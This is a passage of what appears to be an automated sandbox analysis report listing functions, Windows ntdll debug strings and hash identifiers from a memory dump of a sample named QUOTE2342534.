                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 01733255
                                                                                                                                                                                                                                                • HEAP: , xrefs: 01733264
                                                                                                                                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                                • API String ID: 0-617086771
                                                                                                                                                                                                                                                • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                                                                                                                                                                • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                                                                                                                                                                                                                                Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                                                                                • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                                                                                                                                                                • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                                                                                                                                                                                                                                Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $@
                                                                                                                                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                                                                                                                                • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                                                                                                                                                                • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                                                                                                                                                                                                                                Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                                                                                • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                                                                                                                                                                • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                                                                                                                                                                                                                                Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 0178A117
                                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-161242083
                                                                                                                                                                                                                                                • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                                                                                                                                                                • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                                                                                                                                                                                                                                Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-1334570610
                                                                                                                                                                                                                                                • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                                                                                                                                                                • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                                                                                                                                                                                                                                Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-1783798831
                                                                                                                                                                                                                                                • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                                                                                                                                                                • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                                                                                                                                                                                                                                Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                                                                                                                                                                • PreferredUILanguages, xrefs: 017DC212
                                                                                                                                                                                                                                                • @, xrefs: 017DC1F1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                                                                                                                                • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                                                                                                                                                                • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                                                                                                                                                                                                                                Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                                                                                                                                • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                                                                                                                                                                • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                                                                                                                                                                                                                                Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                                                                                                                                • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                                                                                                                                                                • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                                                                                                                                                                                                                                Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                                                                                                                                • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                                                                                                                                                                • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                                                                                                                                                                                                                                Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                                                                                                                                • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                                                                                                                                • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                                                                                                                                                                                                                Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                                                                                                                                • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                                                                                                                                • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                                                                                                                                                                                                                Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                                                                                                                                                                • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                                                                                                                                • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                                                                                                                                • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                                                                                                                                                                                                                Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                                                                                • API String ID: 0-197956300
                                                                                                                                                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                                • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                                                                                                                                                                                Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                                • Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                                                                                                                                                                                • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                                                                                                                                                                                Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$MUI
                                                                                                                                                                                                                                                • API String ID: 0-17815947
                                                                                                                                                                                                                                                • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                                                                                                                                • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                                                                                                                                                                                Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                                                                                                                                                                • kLsE, xrefs: 01720540
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                                                                                                                                • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                                                                                                                                • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                                                                                                                                                                                Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                                                                                • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                                                                                                                                • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                                                                                                                                                                                Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                                                                                                                                • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                                                                                                                                                                                                                Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
